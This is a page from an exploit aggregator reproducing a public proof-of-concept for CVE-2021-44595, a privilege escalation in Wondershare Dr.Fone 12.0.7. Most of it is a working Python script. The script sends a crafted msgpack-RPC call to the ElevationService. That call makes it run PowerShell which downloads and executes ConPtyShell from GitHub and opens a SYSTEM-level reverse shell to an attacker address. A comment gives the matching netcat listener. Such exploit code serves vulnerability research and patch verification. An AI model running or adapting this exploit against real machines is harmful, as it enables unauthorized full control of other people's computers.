Exploit for Wondershare Dr.Fone 12.0.7 Privilege Escalation CVE-2021-44595

Name: Exploit for Wondershare Dr.Fone 12.0.7 Privilege Escalation CVE-2021-44595
Rating: 5 (167 reviews)

2022-05-11 | CVSS 9.0

## https://sploitus.com/exploit?id=PACKETSTORM:167036
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)  
# Date: 4/27/2022  
# Exploit Author: Netanel Cohen & Tomer Peled  
# Vendor Homepage: https://drfone.wondershare.net/  
# Software Link: https://download.wondershare.net/drfone_full4008.exe  
# Version: up to 12.0.7  
# Tested on: Windows 10  
# CVE : 2021-44595  
# References: https://github.com/netanelc305/WonderShell  
  
#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.  
  
#!/bin/python3  
import msgpackrpc  
  
LADDR = "192.168.14.129"  
LPORT = 1338  
  
RADDR = "192.168.14.137"  
RPORT = 12345  
  
param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"  
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))  
result = client.call('system_s','powershell',param)  
  
# stty raw -echo; (stty size; cat) | nc -lvnp 1338